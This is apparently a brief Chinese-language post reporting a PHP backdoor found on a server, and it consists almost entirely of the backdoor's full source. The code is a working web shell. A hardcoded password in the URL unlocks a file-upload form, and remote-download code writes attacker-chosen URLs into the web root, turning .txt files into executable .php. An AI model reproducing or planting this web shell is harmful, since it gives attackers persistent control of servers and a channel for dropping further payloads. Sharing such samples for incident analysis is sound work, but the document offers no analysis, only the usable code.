服务器上发现的一段PHP后门程序
<?php
error_reporting(0);
$path = __DIR__;
if ($_GET["login"] == "2M05Wd") {
if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);
if (move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path))
{echo "<font color=\"green\">file uploaded</font><br />";}
else {echo "<font color=\"red\">upload fail</font><br />";}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
function get($url, $dir)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$data = curl_exec($ch);
if (!$data) {$data = @file_get_contents($url);}
file_put_contents($dir, $data);
}
if ($_GET["url"]) {
$url = $_GET["url"];
preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];
}else{
$z = $n[3];
$name = "moban";
}
if ($_GET["dir"]){
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $_GET["dir"] . "/" . $name . "." . $z;
} else {
$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $name . "." . $z;
}
get($url, $dir);
if (file_exists($dir)) {echo "<tr><td><font color=\"green\">download success</font></td></tr>";} else {echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}} elseif ($_POST["url"]) {
$url = $_POST["url"];
preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);
if ($n[3] == "txt") {
$z = "php";
$name = $n[2];} else {
$z = $n[3];
$name = "moban";}
$dir = $_POST["path"] . "/" . $name . "." . $z;
get($url, $dir);
if (file_exists($dir)) {echo "<tr><td><font color=\"green\">download success</font></td></tr>";} else {echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}}
echo "<tr><td><form method=\"POST\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";}